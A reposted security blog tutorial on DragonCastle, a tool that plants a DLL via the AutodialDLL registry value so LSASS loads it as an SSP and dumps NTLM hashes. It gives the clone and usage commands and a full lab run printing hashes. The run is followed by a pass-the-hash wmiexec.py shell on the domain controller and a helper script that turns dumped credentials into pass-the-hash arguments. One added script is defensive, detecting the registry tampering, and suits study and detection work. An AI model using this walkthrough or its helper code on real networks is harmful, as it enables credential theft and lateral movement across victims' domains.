How to extract NTLM hashes from the LSASS process with DragonCastle

admin, 2023-04-26 00:34:39


About DragonCastle


DragonCastle is a tool that combines the AutodialDLL lateral-movement technique with a Security Support Provider (SSP) to extract NTLM hashes from the LSASS process.

The tool uploads a DLL to the target, starts the Remote Registry service so it can rewrite the AutodialDLL registry value to point at that DLL, and then starts (or restarts) the BITS service. The svchost process hosting BITS loads the planted DLL, which first restores AutodialDLL to its default value and then issues an RPC request that forces LSASS to load the same DLL as an SSP. Once running inside LSASS, the DLL searches process memory for the NTLM hashes and the key/IV used to decrypt them, and writes the result to a file that the tool downloads and then deletes. Every step (writing a DLL to the system drive, toggling services, editing the registry) needs local administrator rights on the target, and each leaves a trace: the file on disk, service state changes, two registry writes and the temporary credential file.
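As an added illustration, not code from DragonCastle or its author, the following Python flags the two artifacts this sequence leaves on the target: an AutodialDLL value that no longer names the stock rasadhlp.dll, and Remote Registry / BITS being started around that change, including the quick restore to the default that the planted DLL performs. The event records are constructed for the example and use simplified field names modelled on Windows events 4657 (registry value modified) and 7036 (service state change); the five-minute correlation window and the service display names are assumptions.

```python
# Added example for this write-up, not code from DragonCastle itself.
# Flags the artifacts the technique leaves behind: the AutodialDLL registry
# value naming something other than the stock rasadhlp.dll, and Remote
# Registry / BITS being started around that change.  Field names are a
# simplified take on Windows events 4657 and 7036; records are constructed.
import ntpath

AUTODIAL_KEY = r"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters"
DEFAULT_DLL = "rasadhlp.dll"          # stock AutodialDLL on Windows
WATCHED_SERVICES = {"Remote Registry", "Background Intelligent Transfer Service"}
WINDOW_SECONDS = 300                  # assumed correlation window


def is_autodial_tampered(value):
    """True when AutodialDLL names anything other than rasadhlp.dll.
    Paths may carry %SystemRoot% or quotes, so only the file name is compared.
    An absent/empty value is treated as default (assumption for this example)."""
    if not value:
        return False
    name = ntpath.basename(value.strip().strip('"'))
    return name.lower() != DEFAULT_DLL


def scan_events(events):
    """Correlate AutodialDLL modifications with service starts.

    Returns finding strings, oldest trigger first.  A change to a
    non-default DLL is always reported; watched services that entered the
    running state within WINDOW_SECONDS of it, and a later restore to the
    default (the planted DLL puts the value back), are reported alongside.
    """
    findings = []
    events = sorted(events, key=lambda e: e["ts"])
    for i, ev in enumerate(events):
        if ev.get("EventID") != 4657:
            continue
        if ev.get("ObjectValueName", "").lower() != "autodialdll":
            continue
        if not is_autodial_tampered(ev.get("NewValue")):
            continue
        findings.append(f"{ev['ts']}: AutodialDLL set to {ev['NewValue']}")
        for other in events:
            if (other.get("EventID") == 7036
                    and other.get("State") == "running"
                    and other.get("Service") in WATCHED_SERVICES
                    and abs(other["ts"] - ev["ts"]) <= WINDOW_SECONDS):
                findings.append(f"{other['ts']}: {other['Service']} started near the change")
        for later in events[i + 1:]:
            if (later.get("EventID") == 4657
                    and later.get("ObjectValueName", "").lower() == "autodialdll"
                    and not is_autodial_tampered(later.get("NewValue"))
                    and later["ts"] - ev["ts"] <= WINDOW_SECONDS):
                findings.append(
                    f"{later['ts']}: AutodialDLL restored to default "
                    f"{later['ts'] - ev['ts']}s after the change")
                break
    return findings


# Constructed sample: the sequence the write-up describes (Remote Registry
# started, AutodialDLL pointed at the planted DLL, Remote Registry stopped,
# BITS started, value restored by the DLL once it ran).
SAMPLE_EVENTS = [
    {"ts": 100, "EventID": 7036, "Service": "Remote Registry", "State": "running"},
    {"ts": 101, "EventID": 4657, "ObjectName": AUTODIAL_KEY, "ObjectValueName": "AutodialDLL",
     "OldValue": r"%SystemRoot%\System32\rasadhlp.dll", "NewValue": r"C:\dump.dll"},
    {"ts": 102, "EventID": 7036, "Service": "Remote Registry", "State": "stopped"},
    {"ts": 103, "EventID": 7036, "Service": "Background Intelligent Transfer Service",
     "State": "running"},
    {"ts": 104, "EventID": 4657, "ObjectName": AUTODIAL_KEY, "ObjectValueName": "AutodialDLL",
     "OldValue": r"C:\dump.dll", "NewValue": r"%SystemRoot%\System32\rasadhlp.dll"},
]

if __name__ == "__main__":
    for line in scan_events(SAMPLE_EVENTS):
        print(line)
```

The restore to the default is deliberately treated as a confirming signal rather than a reason to stand down: a value that flips away from rasadhlp.dll and back within minutes is exactly the shape this tool produces.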

Supported operating system versions


OS version                      Support status
Windows 10 version 21H2         not marked
Windows 10 version 21H1         supported
Windows 10 version 20H2         supported
Windows 10 version 20H1 (2004)  supported
Windows 10 version 1909         supported
Windows 10 version 1903         supported
Windows 10 version 1809         supported
Windows 10 version 1803         supported
Windows 10 version 1709         supported
Windows 10 version 1703         supported
Windows 10 version 1607         supported
Windows 10 version 1511         not marked
Windows 10 version 1507         not marked
Windows 8                       not marked
Windows 7                       not marked

Download


The tool runs under Python 3, so set up a Python 3 environment on your machine first. Clone the project with:

git clone https://github.com/mdsecactivebreach/DragonCastle.git


Usage


psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -h                                                                                                                                            
DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
  -h, --help                        show this help message and exit
  -u USERNAME, --username USERNAME  valid username
  -p PASSWORD, --password PASSWORD  valid password
  -d DOMAIN, --domain DOMAIN        valid domain name
  -hashes [LMHASH]:NTHASH           NT/LM hashes
  -no-pass                          don't ask for password
  -k                                use Kerberos authentication
  -dc-ip ip address                 IP address of the domain controller
  -target-ip ip address             IP address of the target machine
  -local-dll dll to plant           local path of the DLL to upload
  -remote-dll dll location          remote path written into the AutodialDLL registry value


Usage example


The Windows server is at 192.168.56.20 and the domain controller at 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll
DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:

============
[+] Deleting DLL

[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|⇒  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>
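The credential listing above contains duplicate sessions, entries without a cached hash, and several virtual-account sessions (DWM-1, UMFD-0) that carry the same hash as the computer account WINTERFELL$. As an added example, not part of DragonCastle, the script below parses that block, deduplicates it, groups accounts by hash, and emits the `-hashes :NT DOMAIN/user@ip` form that the wmiexec.py step uses. SAMPLE_OUTPUT is a constructed excerpt of the run shown above; the target IP is a parameter.

```python
# Added example for this write-up, not part of DragonCastle.  Turns the
# "Parsing creds" block the tool prints into a deduplicated list of
# (domain, user, NT hash) and into the -hashes form impacket tools such as
# wmiexec.py accept.  SAMPLE_OUTPUT is a constructed excerpt of the run above.
import re

SAMPLE_OUTPUT = """\
============
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:

============
"""

NT_HASH = re.compile(r"^[0-9a-fA-F]{32}$")


def parse_creds(text):
    """Return unique (domain, user, nthash) tuples in first-seen order.

    Records are separated by '----'; a record without a user name or
    without a well-formed 32-hex NT hash is dropped (LSASS sessions with
    no cached credential, as seen in the run above).
    """
    seen, creds = set(), []
    for record in text.split("----"):
        fields = {}
        for line in record.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                fields[key.strip().lower()] = value.strip()
        user = fields.get("user", "")
        domain = fields.get("domain", "")
        nthash = fields.get("ntlm", "").lower()
        if not user or not NT_HASH.match(nthash):
            continue
        key = (domain.lower(), user.lower(), nthash)
        if key not in seen:
            seen.add(key)
            creds.append((domain, user, nthash))
    return creds


def group_by_hash(creds):
    """Map each NT hash to the accounts carrying it.  Virtual-account
    sessions (DWM-1, UMFD-0) sharing a hash with WINTERFELL$ are the
    computer account's logon sessions, not separate credentials."""
    groups = {}
    for domain, user, nthash in creds:
        groups.setdefault(nthash, []).append(f"{domain}\\{user}")
    return groups


def impacket_targets(creds, target_ip):
    """Build the argument string used with wmiexec.py in the run above.
    'Window Manager' and 'Font Driver Host' are local virtual-account
    pseudo-domains, not AD domains, so entries with a space in the domain
    are skipped."""
    return [f"-hashes :{nthash} {domain}/{user}@{target_ip}"
            for domain, user, nthash in creds
            if " " not in domain]


if __name__ == "__main__":
    parsed = parse_creds(SAMPLE_OUTPUT)
    for nthash, owners in group_by_hash(parsed).items():
        print(nthash, "->", ", ".join(owners))
    for arg in impacket_targets(parsed, "192.168.56.10"):
        print("wmiexec.py", arg)
```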


Project


DragonCastle:https://github.com/mdsecactivebreach/DragonCastle


References

https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/
https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
https://adepts.of0x.cc/physical-graffiti-lsass/
https://blog.xpnsec.com/exploring-mimikatz-part-2/
https://twitter.com/TheXC3LL
Originally published by the FreeBuf WeChat public account; reposted at CN-SEC: https://cn-sec.com/archives/1690010.html